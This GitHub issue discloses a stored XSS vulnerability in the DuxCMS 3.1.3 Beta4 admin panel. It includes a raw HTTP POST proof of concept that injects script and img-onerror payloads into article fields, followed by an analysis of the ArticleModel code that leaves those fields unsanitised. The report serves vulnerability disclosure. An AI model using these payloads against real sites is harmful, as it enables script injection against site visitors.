Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

There is a storage XSS vulnerability in adding articles in DuxCMS3.1.3Beta4 background. #6

Open
czheisenberg opened this issue Jun 11, 2024 · 0 comments
Open

There is a storage XSS vulnerability in adding articles in DuxCMS3.1.3Beta4 background. #6

czheisenberg opened this issue Jun 11, 2024 · 0 comments

Comments

@czheisenberg
Copy link

Project address: https://github.com/duxphp/DuxCMS3/
Preparation: log in to the background.

Vulnerability URL:
http://127.0.0.1:8093/s/article/Content/add?
image

POC:

POST http://127.0.0.1:8093/s/article/Content/add? HTTP/1.1
Host: 127.0.0.1:8093
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 328
Origin: http://127.0.0.1:8093
Connection: close
Referer: http://127.0.0.1:8093/s/article/Content/add?
Cookie: PHPSESSID=af75la6jq4hp11pn3gv4ttj15o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=1


class_id=1&title=<script>alert('title')</script>&sub_title=2&image="><img%20src=x%20onerror=alert('img')>&auth=%3Cscript%3Ealert('auth')%3C%2Fscript%3E&sort=2&virtual_view=3&content=<script>alert('content')</script>&keyword=<script>alert('keyword')</script>&description=<script>alert('description')</script>&status=1&article_id=

Tested: title, image, auth, content, description did not check the input.Direct insertion into the database results in a storage-based XSS vulnerability.The auth is not displayed on the page so it is not triggered.
Visit the home page.
http://127.0.0.1:8093/ (you ip and port)
Image
Image
Image

Click on the article
Image
Image

All of the above parameters are triggered.

Vulnerability code:

app/article/model/ArticleModel.php

Line 64-99.

Image

_ saveBefore() can be inferred from the name that the function is to do some processing before saving.

But this part of the code only determines the existence of content and description parameters.
Other parameters do not appear in this part of the code, so other parameters cannot be verified.

And only keyword is specially treated (htmlClear()).

Then we can insert malicious XSS payload.

Take a look at what is saved in the database.
Image
Title, description, image, auth, save as is, content although there is escape operation, but it is still triggered in the previous page.
Only in the keyword parameter, < script > is filtered out.

Image
Image
When line 75 foreach is executed, < script > and < / script > are removed.
Image

From the return value, you can see that the keyword is processed.
That is to say: the _ saveBefore () function is used to do some processing before saving, but only with keyword and no other parameters.
So other parameters accept malicious code that leads to this vulnerability.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@czheisenberg